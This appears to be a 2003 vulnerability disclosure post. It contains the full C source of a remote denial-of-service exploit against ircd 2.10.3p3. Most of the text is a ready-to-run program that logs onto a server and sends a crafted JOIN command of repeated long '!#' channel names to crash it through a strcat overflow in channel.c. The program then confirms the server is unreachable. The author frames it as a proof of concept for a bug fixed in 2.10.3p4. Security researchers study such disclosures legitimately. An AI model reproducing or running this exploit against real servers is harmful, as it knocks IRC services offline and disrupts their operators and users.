Remote irc2.10.3p3 denial of service exploit that makes use of a bug in channel.c that occurs when handling a specially crafted JOIN command.
18f6234073b0b9e3dee6ac4c1f1e73da9b5b1b8677fc854041399955b816fd70
Hello, including this mail is an IRCd remote DOS exploit written by me as a proof of concept.
It works without problems on a default setup of ircd version 2.10.3p3. I didnt had the time to
check it on older versions, but it seems all versions 2.10.x supporting !channels are vulnerable.
This bug got fixed in version 2.10.3p4. Some new bugs in p4 got discovered and p5 was released
a few days after this. For more informations check out: ftp://ftp.irc.org/irc/server/ChangeLog
millhouse@dsns.net
---------------------------------------------------------------------------------------------------------------------------------------------
mauer.c
/** irc2.10.3p3 and maybe below remote DOS exploit by millhouse **
Exploit uses a bug in channel.c that happens while handling
a specially crafted JOIN command.
Program received signal SIGSEGV, Segmentation fault.
0x40108f05 in strcat () from /lib/libc.so.6
As u can see the overflow happens while dealing with strcat().
After a few hours of debugging and testing i'll carefully say
that there is no way to control the functions EIP to make a
code execution possible.
I didnt checked for this bug in other/modified versions of the
IRC deamon so its possible that some of them are vulnerable too.
Smarties should read the coredump to get more informations.
Greets to: servie - (the man with the drastic knowledge)
0 - (helper in asm and debuggin' things)
lordi - (also known as erklärbär)
error - (i promised it)
chosenOne, lexxor, hidro, tgt, mspcshl, coco, tobias...
THIS IS A PROOF OF CONCEPT. HANDLE THIS SOURCE WITH CARE!
/*********************************************07\\10\\2003*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>
#include <netdb.h>
int sckfd;
int sockopen(char *host, int port)
{
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL)
{
fprintf(stderr, "[-] cant handle host ..\n");
exit(1);
}
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
sckfd = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if(connect(sckfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) sckfd=-1;
return sckfd;
}
char *makestring(int len)
{
char *tmp;
int i;
tmp = (char*) malloc(len+1);
memset(tmp,0,len+1);
for (i=0;i<len;i++) tmp[i]=(random()%(122-97))+97;
return tmp;
}
void usage(char *pname)
{
fprintf(stderr, "usage: %s -hp\n", pname);
fprintf(stderr, "\t-h <host/ip> of the ircd\n\t-p <port> default is 6667\n\n");
fprintf(stderr, "\tremember that the IP the exploit is running at must\n");
fprintf(stderr, "\tmatch to a servers I-Line, else this exploit will fail..\n\n");
exit(1);
}
int main(int argc, char *argv[])
{
int opt,i;
int port=6667;
char host[256];
char request[1024], buffer[600];
char reply[2000];
char *name, *string;
struct sockaddr_in addr;
struct hostent *he;
srandom(time(NULL));
fprintf(stdout, "irc2.10.3p3 remote dos exploit delivered by millhouse\n");
fprintf(stdout, "-----------------------------------------------------\n");
memset(host, 0x00, sizeof(host));
memset(request, 0x00, sizeof(request));
memset(buffer, 0x00, sizeof(buffer));
memset(reply, 0x00, sizeof(reply));
while((opt=getopt(argc,argv,"h:p:")) !=EOF)
{
switch(opt)
{
case 'h':
strncpy(host, optarg, sizeof(host)-1);
break;
case 'p':
port=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(argc < 2)
{
usage(argv[0]);
}
if((port <= 0) || (port > 65535))
{
fprintf(stderr,"[-] invalid port ..\n");
exit(1);
}
sckfd=sockopen(host, port);
if(sckfd < 0)
{
fprintf(stderr, "[-] cant connect to %s:%d ..\n", host, port);
exit(1);
}
fprintf(stdout, "[x] connected to %s:%d ..\n", host, port);
name = makestring(9);
fprintf(stdout, "[x] trying to logon with nick %s ..\n", name);
snprintf(request, sizeof(request) -1, "USER %s localhost localhost mauer\r\n"
"NICK %s\r\n",name, name);
write(sckfd, request, strlen(request));
// checks simply if we are allowed to connect or not, a restricted
// connection doesn't bother us.
while(1)
{
recv(sckfd, reply, sizeof(reply), 0);
if(strstr(reply, "ERROR"))
{
fprintf(stderr, "[-] we dont have access, exploit failed ..\n");
exit(1);
}
if(strstr(reply, "MOTD"))
{
fprintf(stdout, "[x] we're logged on, sending evil data ..\n");
break;
}
}
// lets build the join comand and pull it out. open your
// eyes, the root of all evil..
for(i=0;i<9;i++)
{
string = makestring(50);
strcat(buffer, "!#");
strcat(buffer, string);
strcat(buffer, ",");
}
string = makestring(5);
strcat(buffer, "#");
strcat(buffer, string);
snprintf(request, sizeof(request) -1, "JOIN %s\r\n", buffer);
write(sckfd, request, strlen(request));
close(sckfd);
sleep(5);
if (sockopen(host, port) > 0) {
fprintf(stderr, "[-] exploit failed, exiting ..\n");
close(sckfd);
exit(1);
}
fprintf(stdout, "[x] exploit worked, irc unreachable ..\n");
return 0;
}